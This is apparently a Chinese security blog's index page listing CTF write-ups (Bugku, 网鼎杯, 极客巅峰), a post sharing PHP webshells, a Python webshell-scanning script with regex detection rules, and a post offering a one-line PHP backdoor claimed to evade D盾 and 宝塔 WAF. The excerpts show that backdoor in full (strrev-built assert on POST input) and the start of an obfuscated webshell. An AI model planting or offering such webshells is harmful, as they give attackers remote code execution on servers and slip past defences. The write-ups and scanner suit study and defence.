无意中先刷一波bugku 的题目,赶紧还挺有意思的。 当碰到 一道php 反序列化的题目。看的一脸懵逼。可以读取到文件,但是无法理解拿flag 的操作。 后面大佬提点终于明白了,也引发了一些思考 ...
信息安全
密码保护:由xss 引发的一场钓鱼之旅
无意中在i春秋看了一篇文章 https://bbs.ichunqiu.com/thread-26617-1-1.html 刚好我本地弄了一个环境。
网鼎杯第四场wp
网鼎杯第四场,完全被虐着打,根本就打不过, 1、签到题 2、comment 爆破得到账号密码 zhangwei zhangwei666 同时发现git 泄露 get 源代码。发现write_do.php 中很...
网鼎杯第三场wp
网鼎杯第三场wp 连续打了好几次网鼎杯这场是最累的。事在是太累了。到了五点半我实在是gang不住了。我请假回家了。emmmm 回去的路上我都感觉头晕难受 废话不多说了,直接上吧 1、签到题 ...
极客巅峰第二场wp
极客巅峰第二场wp 今天打了一场极客巅峰,因为第一场太忙了,没时间打,也错过了,今天的题目相对来说简单多了,比网鼎杯啥的。都比较简单。 CTF题目后续更新上去。我先上靶场题目。 1、 抛...
网鼎杯第二场wp
网鼎杯网络安全大赛-第二场Writeup 战队:DAFSEC 签到 falg{wangdingbei_nice} 2、套娃-misc 直接对第6张...
网鼎杯第一场WriteUP
网鼎杯第一场WriteUP----china H.L.B 团队 1、签到题 回复1f5f2e进入下一关 2、Clip 下载题目是Disk 文件。第一反应是...
分享几个PHP 大马
分享几个PHP 大马 这个是今天查马的过程中,搜集了一波=。= 那么上吧 <?php $GLOBALS['pass'] = "6d31b7d21395a26b8035fdd7b94bb070d5993de3";$func="cr"/*-/-*...
python 木马查杀工具
python 木马查杀工具 #coding-utf-8 #Coиdθr from sys import argv import os import re rule=['@\$\_\(\$\_', '\$\_=\"\"', '\${\'\_\'', '@preg\_replace\((\")*\/(\S)*\...
分享一个过狗过D盾的小马(过宝塔WAF)
tools 看了下看过可以过D盾的。就看看过宝塔的效果 发现很有意思 <?php $arr = strrev('tressa'); $arr($_POST[strcspn('di', 'ke')]); ?> 密码2 ...